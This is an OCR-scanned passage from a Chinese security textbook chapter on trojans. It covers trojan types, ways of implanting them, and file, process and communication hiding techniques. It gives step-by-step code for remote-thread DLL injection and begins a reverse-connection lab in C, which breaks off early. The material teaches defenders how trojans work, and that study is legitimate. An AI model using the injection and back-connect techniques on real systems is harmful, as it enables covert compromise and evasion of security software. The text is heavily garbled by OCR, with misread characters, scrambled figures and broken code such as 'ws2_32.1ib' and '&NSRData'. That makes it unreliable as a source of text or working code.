根据 木马 对 目标 系统 的 影响 以 及 木马 的 攻击 行为 和 目的 ,将 其 分 为 以 下 几 种 类 型 。 

(1) 远程 控制 型 。 这 是 木马 最 主要 的 类 型 ,一 旦 植 和 人 目标 系统 ,就 使 得 攻击 者 获得 系统 
的 完全 控制 权 。 

(2) 数据 破坏 型 。 这 种 木马 具有 完全 删除 或 损坏 计算 机 上 存储 数据 的 能 力 , 这 些 数据 
可 能 是 操作 系统 文件 或 用 户 数据 。 一 般 来 说 ,破坏 并 非 木马 的 主要 目的 。 

(3) 下 载 型 。 该 类 木马 从 互联 网 上 下 载 其 他 应 用 程序 到 受 控 主机 并 安装 。 下 载 的 程序 
可 能 是 广告 软件 ,间谍 软件 或 控制 型 木马 。 

(4) 安全 软件 对 抗 型 。 这 类 木马 的 攻击 目标 很 明确 ,就 是 系统 的 安全 软件 。 它 们 会 阻 
止 安全 软件 运行 或 者 杀 死 安全 软件 的 进程 ,达到 安全 软件 无 法 响应 的 效果 ,使 系统 失去 保 
护 , 以 便 实施 下 一 步 攻 击 。 

(5) 拒绝 服务 攻击 型 。 这 类 木马 不 会 对 受 控 主机 产生 多 大 影响 ,它们 的 目标 是 互联 网 
上 的 网 站 、 服 务 器 和 其 他 网 络 资源 。 通 过 对 这 些 资源 发 动 洪 泛 攻击 ,使 其 无 法 响应 正常 请 
求 , 达 到 网 络 资源 瘫痪 的 目的 。 

(6) 键盘 记录 型 。 该 类 木马 虽然 不 破坏 被 感染 的 系统 ,但 它们 监控 和 记录 用 户 每 一 次 
击 键 的 内 容 , 并 传送 给 攻击 者 ,攻击 者 提取 其 中 的 敏感 信息 ,达到 窃取 用 户 银行 账户 ` 网 游 账 
户 或 其 他 登录 凭证 等 信息 的 目的 。 


4.2.4 木马 植 入 技术 


植 人 技术 是 木马 实施 攻击 的 前 提 条 件 。 攻 击 者 将 木马 服务 端 植 人 目标 系统 的 途径 
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如 下 。 

(1) 坎 骗 下 载 。 木 马 程序 常 伪 装 成 某 些 常用 的 软件 或 文件 ,比如 视频 .系统 工具 、 文 档 、 
游戏 等 , 当 使 用 者 下 载 这 些 软件 或 文件 时 ,实际 下 载 的 是 木马 程序 或 捆绑 了 木马 程序 的 软 
件 , 一 旦 用 户 按 常规 方式 使 用 这 些 程序 或 文件 ,木马 就 被 安装 到 系统 中 ,从 而 完成 植 人 攻击 。 

(2) 利用 电子 邮件 或 聊天 软件 主动 传播 。 攻 击 者 把 木马 程序 作为 电子 邮件 的 附件 发 送 
到 目标 系统 ,木马 在 附件 中 以 TXT、JPG、ZIP 等 非 可 执行 文件 显示 ,邮件 标题 或 内 容 往 往 
具有 极 大 的 诱惑 性 ,以 便 引 诱 用 户 点 击 附 件 ,如 果 用 户 打开 了 附件 ,那么 目标 机 即 被 植 人 木 
马 。 现 在 已 经 发 展 到 未 打开 附件 也 会 被 植 人 的 情况 。 而 像 QQ .MSN 这 类 聊天 软件 ,攻击 
者 则 是 先 盗 取 某 个 用 户 的 账号 或 者 伪装 成 某 个 合法 用 户 , 然 后 向 其 好 友 发 送 超 链 接 或 文件 
进行 引诱 ,一 旦 点 击 链接 或 打开 文件 ,就 会 被 植 人 木马 。 

(3) 利用 系统 漏洞 或 第 三 方 应 用 软件 漏洞 直接 攻击 。 在 这 类 漏洞 攻击 中 ,缓冲 区 溢出 
攻击 (buffer overflow attacks) 是 植 人 木马 最 常用 的 手段 。 据 统计 ,通过 缓冲 区 溢出 进行 的 
攻击 占 所 有 系统 攻击 总 数 的 80% 以 上 。 

缓冲 区 溢出 是 一 种 系统 攻击 的 手段 ,借助 在 程序 缓冲 区 编写 超出 其 长 度 的 代码 ,故意 造 
成 缓冲 区 溢出 ,从 而 破坏 程序 的 堆栈 ,造成 程序 崩溃 或 使 程序 转 而 执行 其 他 指令 ,以 达到 攻 
击 的 目的 。 随 便 往 缓冲 区 中 填 东 西 造 成 溢出 一 般 只 会 出 现 程 序 运行 错误 ,并 不 能 达到 攻击 
的 目的 。 最 常见 的 手段 是 通过 制造 缓冲 区 溢出 使 程序 执行 攻击 者 在 程序 地 址 空间 中 早已 安 
排 好 的 代码 ,执行 非 授 权 指令 ,甚至 取得 系统 特权 ,进而 进行 各 种 非法 操作 。 为 了 达到 这 个 
目的 ,攻击 者 事先 在 程序 的 地 址 空间 里 安排 代码 ,并 通过 初始 化 寄存 器 和 内 存 , 让 程序 跳 转 
到 入 侵 者 安排 的 地 址 空间 执行 。 该 过 程 如 图 4-3 所 示 ,该 图 示意 一 个 在 Linux 进程 的 地 址 
空间 布局 下 的 溢出 攻击 。 


高 地 址 高 地 址 
Tf 
溢出 后 XxXxx 
返回 地 址 返回 地 址 
一 堆栈 帧 指针 T 堆栈 帧 指针 
上 一 个 函数 a 
函 的 基 址 
数 数 
可 本 
临时 变量 xxxx 
— 栈 顶 指针 1 栈 顶 指针 
低地 址 低地 址 
图 4-3 缓冲 区 溢出 攻击 原理 


(4) 网 页 挂 马 。 即 攻击 者 在 正常 的 页 面 中 (通常 是 网 站 的 主页 ) 插 入 一 段 代码 ,浏览 者 
在 打开 该 页 面 的 时 候 , 这 段 代 码 被 执行 ,然后 下 载 并 运行 某 木马 的 服务 器 端 程序 ,进而 控制 
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浏览 者 的 主机 。 这 类 木马 被 称 为 网 页 木马 ,是 一 种 特殊 的 木马 形式 , 它 不 同 于 普通 木马 ,其 
本 质 是 一 个 HTML 网 页 。 但 从 运行 行为 、 功 能 特点 等 方面 分 析 它 又 具有 木马 的 特征 。 该 
网 页 与 普通 网 页 不 同 之 处 在 于 该 网 页 是 攻击 者 精心 制作 的 ,用 户 一 旦 访问 该 网 页 就 会 被 植 
人 木马 。 

网 页 木马 与 一 般 木 马 的 主要 差别 是 : 网 页 木马 不 能 独立 人 侵 .运行 ,需要 以 浏览 器 为 载 
体 , 经 过 其 过 渡 后 下 载 到 本 地 安装 运行 ,在 此 过 程 中 浏览 器 的 辅助 作用 必 不 可 少 。 

网 页 木马 中 的 脚本 充分 利用 了 浏览 器 的 漏洞 ,让 浏览 器 在 后 台 下 载 攻击 者 放置 在 网 络 
上 的 木马 并 运行 。 网 站 挂 马 的 方法 还 有 利用 JavaScript 脚本 文件 .利用 URL 欺骗 .利用 
body 的 onload 属性 .隐藏 的 分 割 框架 . 层 琶 的 样式 表 (CSS) 等 ,其 目的 都 是 执行 攻击 者 设置 
好 的 恶意 脚本 ,并 通过 该 脚本 下 载 和 运行 木马 程序 。 网 站 挂 马 可 参考 第 5 章 的 相关 内 容 。 

(5) 与 病毒 技术 结合 构成 复合 的 恶意 程序 ,利用 病毒 的 传染 性 进行 木马 的 植 人 。 这 种 
方式 使 得 目标 系统 被 病毒 感染 的 同时 也 被 植 人 了 木马 程序 。 比 如 著名 的 熊猫 烧香 病毒 , 变 
种 很 多 ,感染 了 该 病毒 的 机 器 常常 下 载 大 量 的 木马 ,包括 很 多 盗号 木马 。 

(6) 攻击 者 利用 社会 工程 学 ,管理 上 的 疏漏 或 者 物理 防卫 措施 的 不 足 , 直 接 获取 目标 系 
统 的 控制 权 , 人 工 进行 木马 的 植 人 操作 。 


4.2.5 木马 隐藏 技术 


木马 主要 在 3 个 方面 进行 隐藏 : 文件 隐藏 .进程 隐藏 .通信 隐藏 。 

1. 文件 隐藏 

文件 隐藏 是 指 木马 程序 利用 各 种 手段 伪装 成 磁盘 文件 ,使 得 用 户 无 法 从 表面 上 直接 识 
别 出 木马 程序 。 其 常用 方法 如 下 。 

(1) 艇 入 宿主 文件 中 。 采 用 此 方法 的 木马 往往 把 自身 插入 或 者 捆绑 到 某 个 程序 文件 
中 ,如 果 运 行 该 程序 , 则 木马 也 会 被 启动 。 例 如 捆绑 安装 程序 或 压缩 程序 ,运行 这 些 安装 程 
序 或 压缩 文件 时 木马 也 随 着 开始 运行 。 有 的 木马 捆绑 的 是 系统 文件 ,那么 每 次 系统 启动 时 
木马 也 被 启动 。 

(2) 修改 文件 属性 。 木 马 作 为 独立 文件 存在 时 很 容易 被 发 现 ,因此 木马 一 般 都 会 把 自 
身 的 文件 属性 设置 为 隐藏 .只 读 。 一 些 木 马 还 会 把 文件 释放 到 Windows 或 Windows\ 
system32 目录 下 ,并 且 修 改 文件 生成 日 期 ,以 迷惑 用 户 。 

(3) 伪装 成 非 可 执行 文件 或 系统 文件 。 大 多 数 木 马 是 exe 或 dll 类 型 的 可 执行 文件 ,这 
类 文件 很 容易 引起 用 户 警 觉 ,因此 木马 常常 伪装 成 图 片 文本 等 非 可 执行 文件 。 比 如 木马 文 
件 使 用 图 片 的 默认 图 标 ,并 把 文件 名 改 为 X X X. jpg. exe, 由 于 操作 系统 默认 “隐藏 已 知 文 
件 类 型 的 扩展 名 ”, 木 马 文件 名 显示 为 X X X.jpg: 用 户 会 认为 是 一 个 图 片 而 放松 警惕 。 除 
了 伪装 之 外 ,木马 也 会 通过 名 称 的 相似 性 来 冒充 系统 文件 或 常用 程序 名 。 比 如 把 木马 文件 
命名 为 kernel16. dll, 并 放 到 Windows 文件 夹 下 .这 与 该 文件 夹 下 的 kernel32. dll 系统 文件 
极为 相似 ,非常 具有 欺骗 性 。 木 马 也 可 以 使 用 window. exe、wsocks32. dll、6to41. dll 等 似 是 
而 非 的 名 字 ,用户 很 难 分 辨 其 真 伪 。 

(4) 文件 替换 。 这 种 方法 即 特洛伊 DLL, 也 叫 DLL 陷阱 技术 。 其 原理 是 用 木马 DLL 
替换 系统 原来 的 正常 DLL ,保存 原 DLL 为 其 他 名 字 , 截 获 进程 对 该 系统 DLL 的 所 有 函数 
调用 ,并 对 函数 调用 进行 过 滤 。 如 图 4-4 所 示 , 对 于 常规 的 调用 ,木马 DLL 直接 转发 给 原 系 
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统 DLL; 对 于 特殊 的 调用 ,木马 DLL 就 执行 相关 操作 。 这 种 木马 不 影响 正常 的 系统 调用 ， 
没有 增加 新 的 文件 ,没有 打开 新 的 端口 ,没有 创建 新 的 进程 ,用 户 使 用 常规 方法 很 难 检测 出 
来 。 只 有 在 木马 客户 端 向 服务 端 主机 发 出 特定 的 攻击 指令 后 ,隐藏 的 木马 程序 才 开始 运行 。 


正常 调用 直接 转发 
运行 的 进程 | 被 替换 DLL 
特殊 调用 T 
人 木马 操作 | 


4-4 特洛伊 DLL 示意 图 


因此 ,使 用 文件 替换 技术 的 木马 达到 了 极 强 的 隐蔽 性 ,并 能 长 时 间 潜 伏 在 目标 系统 中 。 

(5) API Hook( 钩 子 ) 技 术 。Hook 是 Windows 消息 处 理 机 制 的 一 个 平台 , Hook 机制 
允许 应 用 程序 截获 处 理 Windows 消息 或 特定 事件 ,木马 可 以 使 用 该 技术 来 隐藏 文件 ,一 般 
方法 是 钓 住 系 统 遍历 文件 的 函数 。 

在 Windows 系统 中 ,查找 文件 的 函数 FindFirstFile 和 FindNextFile 最 终 会 调用 内 核 
中 的 ZwQueryDirectoryFile 函数 ,所 以 只 要 钓 住 该 函数 ,检查 当前 遍历 的 文件 是 否 为 木马 
文件 ,如 果 是 就 进行 必要 处 理 抹 去 文件 信息 ,从 而 达到 隐藏 的 目的 。 

(6) 加 壳 。 一 旦 木马 被 查 杀 软 件 定义 了 特征 码 , 在 运行 前 就 被 拦截 了 。 为 此 ,一 些 木马 
就 被 先 加 了 “ 壳 ”, 它 是 指 一 种 把 应 用 程序 压缩 精简 或 者 加 密 处 理 后 用 自身 代码 形成 一 个 新 
程序 的 技术 。“ 这 ”在 运行 时 将 自身 包 里 的 程序 资源 释放 到 内 存 中 执行 ,就 恢复 了 原来 程序 
的 面目 ,因此 许多 杀毒 软件 其 实 根本 无 法 检测 出 一 个 加 了 壳 的 病毒 。 针 对 加 这 而 产生 的 脱 
过 技术 相对 复杂 ,但 有 部 分 查 杀 软 件 会 尝试 对 常用 这 进行 脱 这 ,然后 再 查 杀 。 例 如 原先 杀毒 
软件 定义 的 该 木马 的 特征 是 *12345”, 如 果 发 现 某 文件 中 含有 这 个 特征 ,就 认为 该 文件 是 木 
马 ; 而 带 有 加 密 功 能 的 壳 则 会 对 文件 体 进 行 加 密 ( 例 如 ,原先 的 特征 是 “12345”, 加 密 后 可 能 
变 成 了 “#1&.@9”, 这 样 杀 毒 软件 就 不 能 靠 文 件 特征 进行 检查 了 )。 脱 壳 指 的 就 是 将 文件 外 
边 的 壳 去 除 ,恢复 文件 没有 加 壳 前 的 状态 。 除 了 被 动 的 隐藏 外 , 据 报道 还 发 现 了 能 够 主动 和 
杀毒 软件 对 抗 的 过 ,木马 在 加 了 这 种 过 之 后 ,一 旦 运行 , 则 外 壳 先 得 到 程序 控制 权 , 由 其 通过 
各 种 手段 对 系统 中 安装 的 杀毒 软件 进行 破坏 ,最 后 在 确认 安全 (杀毒 软件 的 保护 作用 已 经 
被 瓦解 ) 后 由 过 释放 包 右 在 自己 “体内 ”的 木马 体 并 执行 之 。 对 付 这 种 木马 的 方法 是 使 用 具 
有 脱 壳 能 力 的 杀毒 软件 对 系统 进行 保护 。 

2. 进程 隐藏 

一 般 运 行 的 程序 都 必须 被 调和 内存 ,可 以 通过 任务 管理 器 (或 其 他 工具 ) 查 看 是 否 有 可 
疑 进程 。 在 任务 管理 器 中 隐形 的 一 种 方法 是 将 木马 程序 设置 为 “系统 服务 ”。 木 马 进 程 隐藏 
就 是 防止 被 这 类 软件 发 现 ,以 提高 木马 的 隐蔽 性 。 

目前 木马 进程 隐藏 使 用 的 主要 技术 是 API Hook( 钧 子 ) 技 术 和 DLL 骨 人 技术 。 

1) API Hook 技术 

使 用 该 技术 实现 的 进程 隐藏 属于 伪 隐 藏 ( 即 木 马 的 进程 其 实 存在 于 系统 中 ,只 是 不 在 进 
程 列 表 中 出 现 , 不 会 在 任务 管理 器 等 进程 管理 软件 中 显示 )。API(Application 
Programming Interface) 是 Windows 提供 的 应 用 编程 接口 ,使 应 用 程序 在 用 户 级 能 对 操作 
系统 进行 有 效 控制 。Hook 是 一 种 类 似 于 “中 断 ” 的 系统 机 制 ,其 实质 是 一 段 处 理 消息 的 程 
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序 ,通过 系统 调用 ,把 它 挂 人 系统 。 每 当 特 定 的 消息 发 出 ,在 没有 到 达 目 的 窗口 前 , Hook 程 
序 就 先 捕获 该 消息 , 亦 即 Hook 函数 先 得 到 控制 权 。 这 时 Hook 函数 既 可 以 加 工 处 理 ( 改 
变 ) 该 消息 ,也 可 以 不 作 处 理 而 继续 传递 该 消息 ,还 可 以 强制 结束 消息 的 传递 。 

一 个 API Hook 至 少 由 两 个 模块 组 成 : 一 个 是 Hook 服务 器 (Hook server) 模 块 ,一 般 
为 EXE 的 形式 ,负责 Hook 驱动 器 的 注入 和 务 载 ; 另 一 个 是 Hook 驱动 器 (Hook driver) 模 
块 , 一 般 为 DLL 的 形式 ,被 加 载 后 运行 在 被 注入 的 进程 地 址 空间 ,负责 具体 的 API 拦截 和 
处 理 , 如 图 4-5 所 示 。 


Hook 服 务 器 (EXE) i 
调用 安装 
Hook 轴 表 加 Hook 驱 动 器 (DLL) gr 
到 系统 Oe 一 ; 
Hook 链 表 安装 Hook 函 数 国 请 栈 所 
| 
回 加载 Hook 驱 动 器 ， | 他 可 消息 全 给 下 
也 可 以 
上。 用 回调 数 处 理 户 |、 鹤 住 消息 结束 处 理 省 
| 特定 消息 的 Hook 链 表 | 


图 4-5 API Hook 原理 


木马 利用 API Hook 技术 可 以 实现 进程 的 隐藏 。 在 Windows 系统 中 ,应 用 程序 遍历 进 
程 信 息 使 用 的 函数 最 终 会 调用 底层 的 NtQuerySystemInformation 函数 ,因此 木马 只 要 拦截 
该 函数 调用 ,在 函数 结果 返回 给 程序 前 检测 返回 的 进程 信息 是 否 包 含 木马 进程 (通过 PID 
或 名 称 对 比 ) ,如 果 包 含 , 则 将 自身 信息 从 返回 结果 中 删除 ,从 而 导致 任务 管理 器 等 应 用 程序 
无 法 得 到 正确 结果 ,达到 隐藏 木马 进程 的 目的 。 

API Hook 根据 Hook 函数 在 操作 系统 中 层次 的 不 同 ,可 以 分 为 内 核 级 API Hook 和 
用 户 级 API Hook。 内 核 级 API Hook 能 够 监控 系统 所 有 的 活动 细节 ,通过 内 核 级 的 驱动 
程序 (sys 程序 ) 完 成 ;用 户 级 API Hook 则 主要 通过 DLL 完成 ,在 DLL 中 实现 对 API 函数 
调用 的 监视 和 拦截 。 由 于 驱动 程序 工作 在 操作 系统 的 内 核 ,对 系统 稳定 有 直接 影响 , 稍 有 错 
误 就 可 能 引起 系统 崩溃 ,因此 内 核 级 API Hook 的 实现 难度 远 远大 于 用 户 级 API Hook ,很 
多 木马 为 了 追求 稳定 ,采用 了 容易 实现 的 用 户 级 API Hook。 

在 用 户 级 ,应 用 程序 主要 调用 Win32 API 和 Native API, 木 马 可 以 监控 这 些 API 的 调 
用 ,插入 自己 的 隐藏 代码 。 用 户 级 API Hook 的 实现 方法 有 以 下 几 种 。 

(1) IAT Hook。 

IAT(Import Address Table, 输 入 地 址 表 ) 是 PE 文件 输入 数据 段 (. idata) 的 一 部 分 , 存 
放 着 PE 文件 运行 时 所 需 的 所 有 链接 库 和 所 有 需要 调用 的 API 函数 的 地 址 信息 。PE 文件 
运行 时 ,文件 自身 和 所 需 的 链接 库 都 加 载 到 内 存 , 并 在 当前 进程 地 址 空间 建立 API 函数 名 
和 相应 代码 的 映射 ,之 后 就 通过 IAT 来 调用 这 些 API。 

每 个 API 函数 调用 都 会 产生 形 如 CALL DWORD PTRLXXXX] 的 汇编 代码 ,其 中 
[XXXX] 指 向 IAT 表 项 ( 表 项 中 含有 API 函数 在 内 存 中 的 实际 地 址 )。 因 此 ,木马 要 通 
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过 IAT 进行 API Hook, 只 需要 把 IAT 表 项 中 要 钩 住 的 API 函数 地 址 修改 为 木马 自 定义 
函数 地 址 。 这 样 ,进程 对 该 API 的 调用 将 转 到 木马 函数 中 ,从 而 实现 了 对 API 的 拦截 
(图 4-6) 。 


PE 文件 系统 DLL 
IAT 钧 住 前 __ API 函 数 代码 
API 函 数 地 址 


API 调 用 


木马 自 定义 
函数 代码 


代码 
图 4-6 IAT Hook 


(2) Inline Hook, 
Inline Hook 是 基于 对 可 执行 代码 的 改写 ,具体 方法 是 : 先 找到 被 钩 的 API 函数 的 地 
址 ,将 函数 开始 的 几 个 字 节 内 容 进行 保存 后 ,修改 为 一 个 无 条 件 跳 转 指令 JMP, 从 而 使 得 对 
该 API 的 函数 调用 跳 转 到 自 定义 的 函数 (木马 程序 )。 木 马 程序 对 该 调用 进行 自己 的 处 理 
后 ,再 执行 被 改写 部 分 的 原 指令 ,并 跳 转 回 被 钓 函 数 相 应 位 置 ,函数 返回 结果 最 后 由 木马 程 
序 进行 处 理 ( 图 4-7) 。 
程序 API 函 数 


下 XXX | ， 跳 转 到 木马 程序 
Gd 返回 原 函 数 
i 木马 代码 


原 结果 
修改 后 的 结果 
图 4-7 Inline Hook 


2) DLL 峙 入 技术 

既然 进程 容易 被 用 户 发 现 ,那么 最 好 的 办 法 就 是 不 产生 能 被 查看 的 进程 ,木马 采用 
DLL 技术 正好 可 以 实现 这 样 的 目的 。 使 用 DLL 技术 实现 的 进程 隐藏 属于 真 隐 藏 , 即 系统 
中 不 存在 木马 进程 ,木马 不 以 进程 的 形式 运行 (木马 作为 某 个 进程 的 线程 ,运行 于 进程 的 地 
址 空间 )。 尤 其 它 基 本 上 摆脱 了 原 有 的 木马 监听 端口 模式 ,而 是 采用 替代 系统 功能 的 方法 ， 
查 杀 时 不 能 通过 扫描 端口 监视 的 方法 发 现 。 由 于 没有 产生 新 的 进程 ,在 正常 运行 时 木马 几 
乎 没有 任何 症状 。 而 一 旦 木马 的 控制 端 向 被 控制 端 发 出 特定 的 信息 ,隐藏 的 程序 就 立即 开 
始 运行 。DLL 是 Windows 可 执行 文件 的 一 种 ,对 外 提供 许多 功能 函数 ,其 本 身 没 有 程序 逻 
辑 , 不 能 独立 运行 ,需要 进程 加 载 并 调用 。 因 此 ,木马 如 果 以 DLL 技术 实现 ,并 由 其 他 的 合 
法 进程 来 加 载 它 ,那么 在 进程 列表 中 就 不 会 出 现 木马 进程 ,而 只 会 出 现 加 载 该 木马 DLL 的 
合法 进程 ,用 户 也 就 无 法 察觉 木马 程序 的 存在 。DLL 木马 就 是 在 一 个 看 似 普通 的 DLL 文 
件 中 实现 了 完整 木马 功能 的 DLL 文件 。 
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DLL 木马 实现 进程 隐藏 的 关键 问题 就 是 如 何 让 其 他 进程 加 载 木 马 DLL。 

Windows 操作 系统 为 了 自身 的 稳定 和 健壮 ,每 个 进程 都 使 用 独立 的 地 址 空间 ,一 个 进 
程 无 法 访问 和 修改 另 一 个 进程 的 地 址 空间 内 容 。 但 DLL 则 必须 加 载 到 进程 的 地 址 空间 ， 
一 般 合法 进程 是 不 会 主动 加 载 木 马 DLL 的 。 因 此 木马 需要 某 种 可 以 突破 进程 访问 限制 的 
技术 来 加 载 自己 的 DLL 文件 ,而 DLL 艇 入 技术 正 是 解决 这 个 问题 的 有 效 方法 。 

目前 木马 可 能 采用 的 DLL 通 入 技术 有 以 下 几 种 。 

(1) 利用 注册 表 典 入 。 

这 是 早期 木马 常 采用 的 方式 ,通过 修改 注册 表 项 


HKEY LOCAL MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit DLLs 


达到 嵌入 DLL 的 目的 。 该 注册 表 键 值 注 明 的 DLL 将 在 链接 了 User32. dll 的 应 用 程序 (一 
般 是 GUI 程序 ) 进 程 启动 时 自动 加 载 。 该 方法 的 缺点 是 DLL 的 租 入 不 及 时 ,修改 注册 表 后 
需要 重启 机 器 才能 生效 ,并且 会 导致 系统 性 能 大 幅 下 降 , 容 易 被 用 户 发 现 。 

(2) 利用 Hook 技术 嵌入 。 

Hook 驱动 器 一 般 为 DLL 文件 ,并 且 在 被 加 载 后 运行 在 被 注入 的 进程 地 址 空间 ,因此 
可 以 通过 Hook 技术 来 加 载 木 马 DLL。 一般 方法 是 在 木马 DLL 中 实现 一 个 系统 全 局 
Hook ,再 调用 SetWindowsHookEx 函数 来 安装 。 当 某 个 进程 产生 了 被 钩 的 消息 时 ,系统 自 
动 把 木马 DLL 映射 到 该 进程 地 址 空间 ,从 而 使 得 木马 程序 能 够 运行 并 处 理 该 消息 。 该 方 
法 能 入 的 DLL 可 以 在 不 需要 时 调用 UnHookWindowsHookEx 函数 印 载 ,而 且 嵌 和 后 不 用 
重新 启动 系统 。 其 缺点 是 系统 性 能 仍然 受到 很 大 影响 ,并 且 只 在 特定 消息 产生 时 才能 加 载 
木马 DLL ,实时 性 不 强 。 

(3) 远程 线程 技术 。 

远程 线程 技术 是 指 通过 创建 远程 线程 的 方法 进入 另 一 个 进程 私有 内 存 地 址 空间 的 技 
术 。Windows 提供 了 CreateRemoteThread 函数 用 来 在 另 一 个 进程 内 创建 新 线程 ,创建 的 
新 线程 共享 该 进程 地 址 空间 ,并 能 获得 该 进程 的 相关 操作 权限 。 因 此 ,木马 可 以 使 用 该 函数 
在 一 个 合法 的 进程 中 创建 自己 的 远程 线程 ,利用 远程 线程 启动 木马 DLL。 这 样 ,进程 列表 
中 只 会 显示 合法 进程 ,不 会 出 现 木 马 线程 ,从 而 达到 隐藏 自身 的 目的 。 

实现 远程 线程 嵌入 需要 木马 注入 进程 的 配合 ,其 主要 步骤 如 下 : 

Q@ 提升 木马 注入 进程 的 权限 。 因 为 很 多 待 嵌 和 人 进程 受到 系统 保护 ,往往 不 能 直接 打 
开 , 需 要 操作 的 进程 具有 相关 权限 。 例 如 


EnableDebugPriv (SE_DEBUG NAME); // 提 升 木马 注入 进程 到 Debug 权限 


@ 利用 OpenProcess 打开 待 伐 入 进程 ,同时 申请 修改 内 存 地 址 空间 和 建立 远程 线程 的 
足够 权限 。 


hRemoteProcess= OpenProcess (参数 1, 参 数 2, 参 数 3) ; 


参数 1 是 要 拥有 的 该 进程 访问 权限 ,可 以 选 以 下 4 个 之 一 : 
PROCESS_CREATE_THREAD: 允许 在 宿主 进程 中 创建 远程 线程 。 
PROCESS_VM_OPERATION: 允许 对 宿主 进程 进行 VM 操作 。 
PROCESS_VM_WRITE: 允许 对 宿主 进程 进行 VM 写 操作 。 
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PROCESS_VM_ACCESS: 最 高 权限 。 

参数 2 表示 所 得 到 的 进程 句柄 是 否 可 以 被 继承 ,是 一 个 布尔 值 , 通 常 选 FALSE。 

参数 3 是 被 打开 进程 的 PID ,例如 dwRemoteProcessID。 

hRemoteProcess 将 返回 一 个 进程 句柄 值 (成 功 ) ,否则 将 返回 NULL( 失 败 )。 

@ 计算 木马 DLL 文件 名 需要 的 地 址 空间 。 因 为 是 通过 LoadLibraryW 作为 线程 函数 
来 启动 DLL ,该 函数 只 有 一 个 参数 : DLL 文件 的 绝对 路 径 名 szDllFullPath。 例 如 : 


int len= (lstrlenW(szD11Ful1Path)+1) * sizeof (WCHAR); 
@ 调用 VirtualAllocEx 在 待 嵌 入 进程 的 地 址 空间 分 配 DLL 文件 名 缓冲 区 。 例 如 : 


PszLibFileRemote= (WCHAR * ) VirtualAllocEx (hRemoteProcess, NULL, len, MEM _COMMIT, PAGE _ 
READWRITE); 


@ 使 用 WriteProcessMemory 将 DLL 路 径 名 写 到 申请 的 缓冲 区 中 。 例 如 : 
WriteProcessMemory (hRemoteProcess,pszLibFileRemote, (void* )szDllFullPath, len, NULL); 


@@ 通过 函数 GetProcAddress 计算 LoadLibraryW 的 入 口 地 址 ,并 作为 远程 线程 的 入 
口 地 址 。 因 为 LoadLibraryW 在 kernel32. dll 中 定义 ,而 kernel32. dll 在 所 有 进程 内 加 载 
的 地 址 都 是 相同 的 ,所 以 该 入 口 地 址 在 待 腻 入 进程 中 也 一 样 。 例 如 : 


PTHREAD START ROUTINE pfnStartAgddr= (PTHREAD START ROUTINE) 
GetProcAddress (GetModuleHandle ("Kernel32"), "LoadLibraryW"); 


@ 最 后 通过 CreateRemoteThread 函数 创建 远程 线程 ,并 由 该 线程 调用 木马 DLL。 
例如 : 
hRemoteThread= CreateRemoteThread (hRemoteProcess， // 被 嵌入 进程 


NULL，0，PpPfnStartRddr， //loadLibraryW 的 人 口 地 址 
pszLibFileRemote, // 木 马 DLL 的 绝对 路 径 名 (0,NULL) 


通过 以 上 步 又 就 完成 了 远程 线程 的 注入 。 这 种 方法 嵌入 的 DLL 会 在 远程 线程 创建 后 
立即 被 加 载 ,实时 性 高 ,对 系统 性 能 几乎 没有 影响 ,具有 极 强 的 隐蔽 性 。 


4.2.6 通信 隐藏 


木马 服务 端 运行 后 ,需要 通过 TCP/ UDP 等 网 络 连接 与 木马 客户 端 取得 联系 ,进而 获 
取 客 户 端的 攻击 指令 以 及 回 传 数据 到 客户 端 。 木 马 通 信 过 程 常 常会 打开 端口 , 极 易 暴露 木 
马 行踪 ,因此 ,现在 的 主流 木马 都 会 采用 各 种 技术 隐藏 通信 连接 。 

1. 反弹 端口 技术 

该 技术 主要 针对 防火 墙 。 防 火 墙 严 格 监视 主机 的 通信 信息 ,对 于 向 内 的 连接 会 进行 严 
格 的 数据 检查 和 过 滤 ,而 对 于 向 外 的 连接 却 不 作 检查 。 反 弹 端口 技术 正 是 利用 了 防火 墙 的 
这 个 弱点 ,将 传统 客户 /服务 器 模式 的 连接 ,改变 成 服务 端 (被 控制 端 ) 主动 连接 客户 端 (控制 
端 ) 的 连接 形式 。 服 务 端 定时 监测 客户 端的 在 线 情 况 , 如 果 发 现 客户 端 在 线 , 就 主动 连接 客 
户 端 打开 的 端口 。 其 过 程 如 图 4-8 所 示 。 

为 了 实现 端口 隐蔽 ,反弹 端口 木马 使 用 了 隧道 技术 。 木 马 服务 端 与 客户 端 进行 通信 ,是 
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(a) 端口 正 向 连接 方式 (b) 端口 反 向 连接 方式 
图 4-8 端口 连接 方式 


利用 现 有 高 层 协议 的 合法 端口 ,如 80(HTTP 端口 )、21(FTP 端口 ) 等 ,把 所 需 传送 的 数据 
封装 在 像 HTTP 或 FTP 的 报 文中 ( 即 所 谓 的 “隧道 ”技术 ) ,从 合法 端口 传输 。 由 于 客户 端 
的 监听 端口 开 在 防火 墙 信任 的 端口 上 ,防火 墙 认为 是 内 部 用 户 在 浏览 网 页 或 进行 文件 传输 
而 不 会 拦截 。 因 此 ,此 类 木马 能 穿 过 防火 墙 。 典 型 代表 有 “网 络 神偷 ”"“ 灰 蚀 子 "等 木马 。 

实验 4-1 反弹 端口 测试 实验 

【实验 目的 】 

(1) 理解 “反弹 端口 技术 。 

(2) 理解 木马 客户 端 与 服务 端的 交互 模式 。 

【实验 环境 】 

测试 可 选择 实体 机 或 在 虚拟 机 里 进行 ,操作 系统 为 Windows 平台 。 

【实验 原理 】 

从 本 质 上 来 说 , 反 向 连接 和 正 向 连接 的 区 别 并 不 大 。 在 正 向 连接 的 情况 下 ,服务 端 也 就 
是 被 控制 端 ,在 编程 实现 的 时 候 采 用 服务 器 端的 编程 方法 ;而 控制 端 在 编程 实现 的 时 候 采 用 
的 是 客户 端的 编程 方法 。 当 采用 反弹 的 方法 编程 的 时 候 , 实 际 上 就 是 将 被 控制 端 变 成 了 采 
用 客户 端的 编程 方法 ,而 将 控制 端 变 成 了 采用 服务 端的 编程 方法 。 

【实验 过 程 】 

(1) 根据 端口 复 用 原理 , 先 编写 控制 端的 程序 。 下 面 是 程序 示例 。 


#include< winsock2.h> 
#include< stdio.h> 
#pragma comment (lib, "ws2_32.1ib") 
void main (int argc,char * * argv) 
{ 
char * messages="\r\n==========BackConnect Check=========\r\n"; 


WSADATA WSAData; 


SOCKET sock; 

SOCKADDR_IN addr in7 

char buf1[1024]; // 作 为 socket 接收 数据 的 缓冲 区 
memset (buf1,0,1024); // 清 空 缓冲 区 


if (WSAStartup (MAKEWORD (2,0) ,&NSRData) != 0) 
{ 
Printf ("WSAStartup error.Error:d\n",WSAGetLastError ()); 
